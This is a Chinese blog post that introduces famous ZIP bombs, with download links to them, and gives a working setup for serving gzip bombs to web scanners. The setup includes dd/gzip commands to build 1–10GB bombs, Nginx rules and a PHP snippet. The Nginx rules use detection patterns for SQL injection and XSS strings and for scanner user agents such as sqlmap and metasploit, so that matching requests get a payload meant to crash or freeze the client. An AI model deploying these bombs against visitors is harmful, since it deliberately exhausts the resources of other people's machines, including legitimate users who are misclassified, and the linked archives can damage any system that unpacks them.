zip炸弹简介(附件)，以及用Gzip炸弹对抗爬虫恶意扫描与入侵尝试

面对这种不识趣的行为，是时候给他们一点小小的惊喜了。

ZIP炸弹：数字世界的“潘多拉魔盒”

zip炸弹其实是算法惹的祸，无损压缩的有趣点就是重复

4.5PB压缩包(42kb)，你可能听说过传说中的ZIP炸弹——那个著名的42KB压缩包，解压后竟然变成4.5PB的庞然大物。原理很简单：利用无损压缩算法的特性，通过多层递归嵌套，让解压过程像滚雪球一样不断膨胀。具体来说，42.zip文件初始只有42KB，解压密码为42，但解压后会得到16个压缩包，每个包又包含16个更小的包，如此反复5次，最终产生1048576个4.3GB的文件，总体积达到惊人的4.5PB。貌似是制作者的下载介绍平台：https://unforgettable.dk/

无限大小压缩包（28kb）还有droste.zip，这个文件名灵感应该取自德罗斯特效应 （ Droste Effect ），是指一张图片的部分与整张图片相同，无限循环。就好比两部手机，手机A开启屏幕镜像和相机，手机B接收手机A的屏幕镜像，手机A拍摄手机B的屏幕，就发现手机B无限循环展示。droste.zip本体只有28kb，但可以无限递归解压快速膨胀，解压本体，直到塞满你的硬盘，也是非常强大了，算法大概就是在引号里重复这句话 “ 在引号里重复这句话 ”。貌似是制作者的下载介绍平台：https://alf.nu/ZipQuine

1000YB压缩包（122kb）前段时间，有人在网上宣称自己制作了世界上最大的ZIP炸弹，容量达到1148857344 Quettabytes（1 Quettabyte = 1,000,000,000,000,000,000,000,000,000,000 bytes，后面有30个零）。也就是最大单位YB，1000尧字节（yottabyte）下载：https://twsh.lanzouu.com/iaSw9376uwih

2048YB压缩包（266kb）有人制作了2048YB压缩包，这是我目前见过的最大压缩包，这个数字之大连理解起来都困难。这是我复刻的地址：https://github.com/twsh0305/ZIPBOMB

虽然各大安全软件已经会识别zip炸弹，但仍然不可轻视，因为zip的各种属性可以被篡改，安全软件可能识别不到的。曾经，有人利用zip炸弹，让安全软件清理zip炸弹结果过程中，去入侵系统等操作，所以当初的危害还是比较大的。

实战：制作温和版Gzip炸弹

虽然上述的ZIP炸弹威力巨大，但我们并不需要那么极端。一个1GB的Gzip炸弹足以让恶意扫描者的内存跑到2GB，多次访问至少会导致对方杀后台、宕机或卡顿，用于对抗恶意扫描，恶意爬虫防护足够了。

生成Gzip炸弹

Pythen版更好用，可自定义大小

mkdir -p /www/wwwroot/default.com/gzip_bomb/

dd if=/dev/zero bs=1M count=1024 | gzip > /www/wwwroot/default.com/gzip_bomb/bomb.gz

dd if=/dev/zero bs=1M count=10240 | gzip > /www/wwwroot/default.com/gzip_bomb/bomb.gz

Nginx使用Gzip炸弹

实现默认站点任何访问都返回炸弹，以宝塔为例子

创建网站default.com

设置为默认网站

修改默认网站Nginx配置

    # 将所有访问重定向到/index.html
    # location / {
        # 使用301重定向到/index.html，让用户看到URL变化
    #    return 301 /index.html;
    # }
    # 上下两者是或的关系，只能开一个，取消注释则开启，解释部分不要取消注释
    # 使用rewrite（保持URL不变）
     location / {
         rewrite ^(.*)$ /index.html last;
     }
    
    # 处理/index.html请求，返回gzip炸弹
    location = /index.html {
        # 设置正确的MIME类型
        default_type text/html;
        
        # 关键：声明这是gzip压缩内容
        add_header Content-Encoding gzip;
        
        # 防止MIME类型嗅探
        add_header X-Content-Type-Options nosniff;
        
        # 禁用缓存
        add_header Cache-Control "no-cache, no-store, must-revalidate";
        add_header Pragma "no-cache";
        add_header Expires "0";
        
        # 返回gzip压缩的炸弹文件，把炸弹放在指定位置
        alias /www/wwwroot/default.com/index.html.gz;
        
        # 可选：添加更多伪装头
        add_header Content-Type "text/html; charset=utf-8";
    }

其它网站可以增加nginx判断条件(不要直接用，只是示例，用于正在使用的网站，而不是上面那种啥请求都返回炸弹的)

# 针对常见恶意扫描路径返回zip炸弹
location ~* ^/(目录名|目录名|目录名|目录名|backup|config|database) {
    # 设置正确的MIME类型
    default_type text/html;
    add_header Content-Encoding gzip;
    
    # 禁用缓存
    add_header Cache-Control "no-cache, no-store, must-revalidate";
    add_header Pragma "no-cache";
    add_header Expires "0";
    
    # 返回zip炸弹文件
    alias /www/wwwroot/default.com/index.html.gz;
}

# 针对恶意文件类型请求
location ~* \.(php|asp|aspx|jsp|sh|pl|py|exe|dll)$ {
    # 设置正确的MIME类型
    default_type MIME类型; #默认网页声明，记得改，伪装就行
    add_header Content-Encoding gzip; #记得改，伪装就行
    
    # 禁用缓存
    add_header Cache-Control "no-cache, no-store, must-revalidate";
    add_header Pragma "no-cache";
    add_header Expires "0";
    
    # 返回zip炸弹文件
    alias /www/wwwroot/default.com/index.html.gz;
}

# 针对恶意文件类型请求
location ~* \.(php|asp|aspx|jsp|sh|pl|py|exe|dll)$ {
    # 检查是否在正常目录外请求这些文件，以下是排除，如上面是执行脚本，下面目录就填静态文件目录，如防止PHP脚本被意外上传到媒体目录，被访问执行操作
    if ($uri !~ "^/(目录|目录)/") {
        default_type text/html;
        add_header Content-Encoding gzip;
        add_header Cache-Control "no-cache, no-store, must-revalidate";
        add_header Pragma "no-cache";
        add_header Expires "0";
        alias /www/wwwroot/default.com/index.html.gz;
    }
}

# 针对SQL注入和XSS攻击特征
location ~* "(union.*select|sleep\(|benchmark|exec\(|eval\(|base64_decode|script\s*=|onload\s*=)" {
    default_type text/html;
    add_header Content-Encoding gzip;
    add_header Cache-Control "no-cache, no-store, must-revalidate";
    add_header Pragma "no-cache";
    add_header Expires "0";
    alias /www/wwwroot/default.com/index.html.gz;
}

# 针对扫描工具User-Agent（UA）
if ($http_user_agent ~* "(nmap|sqlmap|w3af|nikto|acunetix|nessus|metasploit)") {
    default_type text/html;
    add_header Content-Encoding gzip;
    add_header Cache-Control "no-cache, no-store, must-revalidate";
    add_header Pragma "no-cache";
    add_header Expires "0";
    alias /www/wwwroot/default.com/index.html.gz;
}

# 正常网站请求继续处理，伪静态等，在其他位置设置过就无需再设置
# location / {
    # 如wordpress：try_files $uri $uri/ /index.php?$args;
# }

# 正常PHP处理 将PHP文件交给PHP-FPM处理
# location ~ \.php$ {
#     include fastcgi_params;
#     fastcgi_pass php-fpm;
#     fastcgi_index index.php;
#     fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
# }

PHP使用Gzip炸弹

如果使用PHP，可以这样返回Gzip炸弹，你可以参考这个，并且增加某些条件，注意炸弹位置路径，并且可以与nginx互相配合，让PHP告知nginx返回什么，URL也不变，玩法多变，自己思考。

<?php
//声明格式
header('Content-Encoding: gzip');
//返回网站目录中的炸弹
echo file_get_contents('index.html.gz');
?>

其他语言基本都是这个逻辑

效果展示

实际上，5GB的炸弹让浏览器内存占用瞬间飙升到5000MB了，只是我没截到

结语

部分爬虫已经实现识别压缩炸弹，并不会去解压导致他的服务器宕机，所以Gzip炸弹并不是100%成功。

只是歪门邪道罢了，一点儿惩罚对手的小手段，求求你别扫了，我送你个礼物好不好。

原文链接(非王先生笔记发布均为盗版)：https://wxsnote.cn/6511.html